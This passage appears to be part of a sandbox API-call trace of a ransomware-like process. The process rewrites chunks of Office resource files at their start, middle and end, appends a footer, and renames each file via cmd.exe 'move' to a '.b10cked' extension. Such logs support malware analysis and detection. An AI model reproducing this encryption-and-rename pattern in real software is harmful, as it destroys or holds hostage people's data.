0x87f60 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x87f60 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.131] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.131] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.147] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.148] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.149] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.149] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0172.149] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.183] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.184] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.185] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0172.185] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.186] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.193] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x67f60 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.193] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x67f60 [0172.194] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.194] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.194] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0172.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0172.198] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x87f60 [0172.198] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.198] CloseHandle (hObject=0x114) returned 1 [0172.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX") returned 0x3c [0172.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.203] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x958, dwThreadId=0x2ac)) returned 1 [0172.208] CloseHandle (hObject=0x1b4) returned 1 [0172.208] CloseHandle (hObject=0x114) returned 1 [0172.208] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.208] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.208] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.208] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.208] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22923319330) returned 1 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.446] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.446] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.446] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x57a78 [0172.446] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x57f60 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x57f60 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.613] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.614] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.616] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.616] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.616] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.617] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.617] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x37f60 [0172.617] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.622] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.623] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.624] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x37f60 [0172.624] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.624] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.625] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0172.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0172.628] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x57f60 [0172.629] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.629] CloseHandle (hObject=0x114) returned 1 [0172.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX") returned 0x3c [0172.649] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.650] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x134, dwThreadId=0x740)) returned 1 [0172.743] CloseHandle (hObject=0x1b4) returned 1 [0172.743] CloseHandle (hObject=0x114) returned 1 [0172.743] CharUpperBuffW (in: 